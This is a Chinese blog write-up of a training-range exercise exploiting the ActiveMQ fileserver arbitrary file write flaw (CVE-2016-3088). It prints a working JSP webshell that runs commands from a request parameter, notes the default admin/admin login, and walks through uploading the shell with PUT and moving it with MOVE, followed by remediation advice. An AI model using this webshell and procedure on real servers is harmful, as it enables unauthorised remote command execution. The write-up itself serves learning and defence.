ActiveMQ任意文件写入漏洞分析溯源

最新推荐文章于 2024-06-01 09:55:44 发布
最新推荐文章于 2024-06-01 09:55:44 发布
阅读量1k 收藏 1
点赞数 2
分类专栏: Web安全 文章标签: ActiveMQ 任意文件上传
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wang_624/article/details/100545006
版权

文章目录

墨者学院

WEB安全

ActiveMQ任意文件写入漏洞分析溯源

ActiveMQ 简介

ActiveMQ 是 Apache 软件基金会下的一个开源消息驱动中间件软件。Jetty 是一个开源的 servlet 容器,它为基于 Java
的 web 容器,例如 JSP 和 servlet 提供运行环境。ActiveMQ 5.0
及以后版本默认集成了jetty。在启动后提供一个监控 ActiveMQ 的 Web 应用

fileserver是一个RESTful API接口,我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作,其设计目的是为了弥补消息队列操作不能传输、存储二进制文件的缺陷,但后来发现:

  1. 其使用率并不高
  2. 文件操作容易出现漏洞
漏洞复现

  1. 访问url

    [外链图片转存失败(img-1HKCRMhE-1567593936607)(C:\Users\13659\AppData\Roaming\Typora\typora-user-images\1567586846125.png)]

  2. 查找漏洞

    搜索发现存在CVE-2016-3088 漏洞,找到分析查看漏洞原因

    查询发现在ActiveMQ<5.12.x版本存在fileserver 应用,可以通过fileserver写入文件(不解析jsp文件)通过移动到任意位置,就可以造成任意文件写入漏洞。

    文件写入的几种利用方式

    1 写入webshell

    2 写入 cron 或 ssh key

    3 写入 jar 或 jetty.xml 等库和配置文件

    写入webshell的好处是,门槛低更方便,但前面也说了fileserver不解析jsp,admin和api两个应用都需要登录才能访问,所以有点鸡肋;写入cron或ssh
    key,好处是直接反弹拿shell,也比较方便,缺点是需要root权限;写入jar,稍微麻烦点(需要jar的后门),写入xml配置文件,这个方法比较靠谱,但有个鸡肋点是:我们需要知道activemq的绝对路径。

  3. 漏洞利用

    尝试写入jsp

    有回显带密码验证的
<% 
    if("023".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>
请求url:http://ip:port/Shell/cmd2.jsp?pwd=023&i=ls

    通过burp访问,发现需要验证,需要登录,我们尝试登录,默认的ActiveMQ的账号和密码均为admin

    [外链图片转存失败(img-41qx81dr-1567593936610)(C:\Users\13659\AppData\Roaming\Typora\typora-user-images\1567588127893.png)]

    登录后查看http方法 ,发现没有put方法

    [外链图片转存失败(img-Aj1yZ2mY-1567593936612)(C:\Users\13659\AppData\Roaming\Typora\typora-user-images\1567588291964.png)]

    执行put方法 发现却上传成功了

    [外链图片转存失败(img-tAfJ6kfK-1567593936614)(C:\Users\13659\AppData\Roaming\Typora\typora-user-images\1567591713323.png)]

    接下来通过move移动到admin或api下,就可以解析jsp文件了, 查找他的绝对路径

    访问url:http://ip:port/admin/test/systemProperties.jsp

    在这里插入图片描述

    通过move方法将jsp木马移动到admin或api下,进行解析

    在这里插入图片描述

    然后访问,可以执行命令,

    [外链图片转存失败(img-WBjI6m66-1567593936620)(C:\Users\13659\AppData\Roaming\Typora\typora-user-images\1567591882796.png)]

    这里就可以直接查看flag,但是找了半天没找到,最后在根目录找到了flag

    [外链图片转存失败(img-MXybFIcb-1567593936621)(C:\Users\13659\AppData\Roaming\Typora\typora-user-images\1567592783859.png)]

解决方案
  1. ActiveMQ Fileserver 的功能在 5.14.0 及其以后的版本中已被移除。建议用户升级至 5.14.0 及其以后版本。
  2. 通过移除 conf\jetty.xml 的以下配置来禁用 ActiveMQ Fileserver 功能
参考链接

jsp一句话

ActiveMQ任意文件写入漏洞

0zzie
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ActiveMQ
孤剑辰的博客
03-17 1774
ActiveMQ简介: 安装部署: ActiveMQ简介: ActiveMQ是一个消息队列,现在用的很少了,只需要了解即可。 官网: ActiveMQ 软件下载地址: ActiveMQ 5.16.4版本: https://www.apache.org/dyn/closer.cgi?filename=/activemq/5.16.4/apache-activemq-5.16.4-bin.tar.gz&action=download 下载后解压到目录中 配置文件 a
apache-activemq-5.16.5
12-27
apache-activemq-5.16.5,启动要求jdk版本8+
探索Apache ActiveMQ的安全边界:ActiveMQ-RCE工具深度解析
最新发布
gitblog_00081的博客
06-01 660
探索Apache ActiveMQ的安全边界:ActiveMQ-RCE工具深度解析 项目地址:https://gitcode.com/X1r0z/ActiveMQ-RCE 在安全研究与攻防对抗的前沿阵地,每一个新发现的漏洞都是对技术边界的一次挑战。今天,我们聚焦于一个名为ActiveMQ-RCE的开源工具,它专为应对近期曝光的严重安全漏洞CVE-2023-46604而生,是Go语言的杰作。本文将全...
ActiveMQ任意文件写入漏洞(CVE-2016-3088)
jie_a的博客
07-26 264
嘻嘻,狗哥下任务了,开始我的漏洞复现之旅 首先环境肯定是用vulhub创建 进入vulhub文件夹,找漏洞目录 运行漏洞环境:docker-compose up -d 访问http://your-ip:8161/看到web页面,说明环境已成功运行。 操作思路 本漏洞出现在fileserver应用中,漏洞原理其实非常简单,就是fileserver支持写入文件(但不解析jsp),同时支持移动文件(MOVE请求)。所以,我们只需要写入一个文件,然后使用MOVE请求将其移动到任意位置,造成任意文件写入漏洞。 三种方
铁三知识点复习 webshell
zydbk123456的博客
03-15 1141
铁三知识点复习 webshell 什么是webshell? webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。简单来说就是通过...
【网络安全】文件写入漏洞原理及利用方式简析
等风来
12-24 2790
当web网站对用户写入、上传的文件缺乏权限限制或文件类型的检验功能不全等,攻击者可以通过web网站写入恶意文件到服务器。该漏洞经常出现在模板备份、文件编辑、文件备份等功能点。PHP文件写入的常见函数包括fopen()、fwrite()、fputs()、file_put_contents()等。
activemq 接收文件流 C#
04-15
本篇将详细探讨如何使用C#与ActiveMQ进行交互,尤其是如何接收文件流。我们将从基础概念、环境配置、C#客户端库介绍、接收文件流的步骤以及示例代码等方面进行深入讲解。 首先,理解ActiveMQ的基本工作原理至关重要...
ActiveMQ的安全机制使用及其源代码分析
01-30
最近在项目开发中,需要为ActiveMQ开发基于IP的验证和授权机制,因此,对ActiveMQ的安全机制进行了了解,以下将介绍ActiveMQ的安全机制使用及其源代码分析。操作系统:WindowsXPJava:jdk1.6.0_12maven:maven3.0.4...
ActiveMQ 反序列化漏洞(CVE-2015-5254)利用工具
08-15
在2015年,ActiveMQ被发现存在一个严重的安全漏洞,被称为CVE-2015-5254,这是一个反序列化漏洞,允许攻击者通过精心构造的恶意消息来执行任意代码,从而对目标系统造成重大威胁。 反序列化漏洞通常发生在对象从...
activeMQ文件上传的应用
01-22
文件上传应用中,ActiveMQ可以作为数据传输的桥梁,实现文件的异步传输,提高系统的性能和可扩展性。 在描述中提到的"activeMQ与uploadify整合",是指将ActiveMQ与Uploadify插件结合使用,以实现高效、流畅的文件...
ActiveMQ 配置文件详解
08-03
**ActiveMQ配置文件详解** Apache ActiveMQ 是一个开源的消息中间件,它实现了多种消息协议,如JMS(Java Message Service)和AMQP(Advanced Message Queuing Protocol),并且广泛应用于分布式系统中,提供可靠的...
apache-activemq-5.16.5-bin.tar.gz 下载(5积分)
08-17
Apache ActiveMQApache软件基金会的一个开源项目,是一个基于消息的通信中间件ActiveMQ是JMS的一个具体实现,支持JMS的两种消息模型。ActiveMQ使用AMQP协议集成多平台应用,使用STOMP协议通过websockets在Web应用程序之间交换消息,使用MQTT协议管理物联网设备 ActiviMq消息队列,可解决服务解耦合的动作,缓解了服务并发量很大而造成服务器无法处理的状况。
【Tomcat-8.5.19】文件写入漏洞
m0_63241485的博客
08-25 3506
tomcat后端使用org.apache.catalina.servlets.JspServlet来处理jsp或是jspx后缀的请求, 而JspServlet负责处理所有JSP和JPSX类型的动态请求, 从代码没有发现处理HTTP PUT类型的操作,所以可知PUT以及DELTE等HTTP操作由DefautServelt实现。该漏洞实际上是利用了windows下文件名解析的漏洞来触发的。
漏洞复现】---- ActiveMQ任意文件写入漏洞(CVE-2016-3088)
qq_43168364的博客
09-05 734
一、简介 ActiveMQ的web控制台分为三个应用:admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是存储文件接口;admin和api都需要登录后才能使用,fileserver无需登录。 fileserver是一个RESful API接口,我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作,其设计的目的是为了弥补消息队列操作不能传输、存储二进制文件的缺陷,但后来发现: (1) 其使用率并不高 (2) 文件操作容易出
thinkphp 6.x 任意文件写入漏洞
Aiwin的博客
08-06 3808
thinkphp 6.x 任意文件写入漏洞
ActiveMQ简介
simple的博客
05-06 494
ActiveMQ介绍 ActiveMQ是什么 ActiveMQApache推出的,一款开源的,完全支持JMS1.1和J2EE 1.4规范的JMS Provider实现的消息中间件(Message Oriented Middleware,MOM) ActiveMQ能干什么 最主要的功能就是:实现JMS Provider,用来帮助实现高可用、高性能、可伸缩、 易用和安全的企业级面向消息服...
vulhub ActiveMQ任意文件写入漏洞 (CVE-2016-3088)
箭雨镜屋
05-23 1370
引言 今天来复现一下ActiveMQ任意文件写入漏洞 (CVE-2016-3088) vulhub的官网有对这个漏洞的英文介绍ActiveMQ Arbitrary File Write Vulnerability (CVE-2016-3088) 本文主要分为三个部分: 漏洞原理(基于vulhub)以及知识点引申 漏洞复现 漏洞引发的思考 漏洞介绍和知识拓展 背景简述和漏洞详情部分来源于vulhub 背景简述 ActiveMQ的web控制台分为三个应用,admin、api和fileserver,其中ad
写入文件_漏洞复现:ActiveMQ任意文件写入漏洞(CVE20163088)
weixin_42107561的博客
01-12 480
文章说明漏洞复现是为了学习漏洞利用所写,漏洞都是互联网上以流传已久的各种漏洞的利用及原理,用来增强自己见识,培养自己动手能力,有兴趣的朋友可自行搭建环境练习。源码下载连接在文章最后。漏洞说明该漏洞出现在fileserver应用中,漏洞原理:ActiveMQ中的fileserver服务允许用户通过HTTP PUT方法上传文件到指定目录。Fileserver支持写入文件(不解析jsp),但是...
网络安全之文件包含漏洞总结
kali_Ma的博客
03-10 2262
介绍 文件包含漏洞属于代码注入漏洞,为了减少重复代码的编写,引入了文件包含函数,通过文件包含函数将文件包含进来,直接使用包含文件的代码;简单来说就是一个文件里面包含另外一个或多个文件。 但我们除了包含常规的代码文件外,包含的任意后缀文件都会被当作代码执行,因此,如果有允许用户控制包含文件路径的点,那么则很有可能包含非预期文件,从而执行非预期的代码导致getshell。 几乎所有的脚本语言中都会提供文件包含的功能,但文件包含漏洞在PHP Web Application中居多,在JSP、ASP中十分少甚至没有,
ActiveMQ 反序列化漏洞
08-19
ActiveMQ 反序列化漏洞是指在使用 ActiveMQ 进行消息传递时,由于未正确验证和过滤用户提交的数据,恶意攻击者可以利用该漏洞在目标系统上执行任意代码。这种漏洞通常是由于未正确配置 ActiveMQ 的序列化和反序列化机制造成的。 攻击者可以构造恶意序列化对象,然后将其发送给 ActiveMQ 服务器。当服务器接收到恶意序列化对象并进行反序列化时,恶意代码就会被执行,从而导致系统受到攻击。 为了防止 ActiveMQ 反序列化漏洞的利用,可以采取以下措施: 1. 更新和升级:及时更新 ActiveMQ 版本,以获取最新的安全修复和漏洞修复。 2. 配置安全策略:通过配置 ActiveMQ 的安全策略来限制用户对序列化和反序列化的访问权限,只允许信任的类进行反序列化操作。 3. 输入验证和过滤:在接收到消息之前,对用户提交的数据进行严格的输入验证和过滤,确保只接受合法和可信的数据。 4. 序列化过滤:实施白名单机制,只允许特定的类进行反序列化操作,阻止未知类的反序列化。 5. 安全意识培训:加强对开发人员和系统管理员的安全意识培训,提高他们对反序列化漏洞的认识,以及如何正确地使用 ActiveMQ。 请注意,这些建议只是一些通用的防御措施,具体的安全配置和防护措施需要根据实际情况进行调整和实施。建议在使用 ActiveMQ 或其他中间件时,密切关注厂商的安全公告和最佳实践。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值